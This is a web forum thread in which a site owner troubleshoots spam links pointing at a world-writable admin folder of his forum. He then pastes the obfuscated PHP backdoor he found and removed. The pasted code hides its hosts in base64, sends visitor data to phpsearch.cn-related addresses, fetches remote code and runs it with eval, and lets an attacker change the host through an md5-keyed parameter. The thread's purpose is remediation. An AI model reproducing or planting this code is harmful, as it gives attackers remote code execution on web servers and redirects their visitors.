dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
732

KeysCapt

join:2001-07-11
Carson City, NV

1 edit

KeysCapt

Forum folder security question

I run a private forum using Invision Power Board v2.2. In the domain error log, I see numerous entries similar to this:
File does not exist: /home/domain/public_html/forums/admin/ggg-devot-torrent.html
File does not exist: /home/domain/public_html/forums/admin/tribalwars-bot-crack.html
 
If I do a search on who links to the site, I see hundreds of links like those above to files that don't exist.
That particular folder has permissions set to 777. If I restrict it, I get constant errors in the log saying that an .htaccess file cannot be checked. Any help with this would be greatly appreciated. It looks like somehow the folder is being used to relay porn and other crap although I don't know how it would be accessed.

Edit: I'm wondering now if when I change the permissions to restrict access, all the .htaccess errors are caused by these spambots or whatever hitting the site unsuccessfully. I do have it restricted now.

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

said by KeysCapt:

Edit: I'm wondering now if when I change the permissions to restrict access, all the .htaccess errors are caused by these spambots or whatever hitting the site unsuccessfully. I do have it restricted now.
That is correct.

KeysCapt

join:2001-07-11
Carson City, NV

KeysCapt

OK thanks. I'd love to understand how all these sites can use that folder as a relay or whatever when nothing is visible at any time in the folder via FTP.

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

Click for full size
How are you accessing the site via ftp?
If you are using your browser, files can be hidden from your view.
If you are using an ftp client (e.g., filezilla) be sure to check "show hidden files"

KeysCapt

join:2001-07-11
Carson City, NV

KeysCapt

FireFTP. Show hidden files is, and has been checked.


KeysCapt

KeysCapt

For anyone who is interested, apparently the folder had permissions that facilitated click-through, and a php file was placed in it to allow referrers and file transfers. The contents of the php file look like this:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2bdd74c2ad8bb543db32dd89479614c3") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>
 
I've deleted that and replaced the .htaccess file which apparently allowed the exploit. The folder permissions have been restricted, and all the hits are now failing.
Thanks to Snowy See Profile for all the help digging into this.
19579823 (banned)
An Awesome Dude
join:2003-08-04

1 edit

19579823 (banned) to KeysCapt

Member

to KeysCapt
quote:
I do have it restricted now.
Excellent -- the idiots will be kept at bay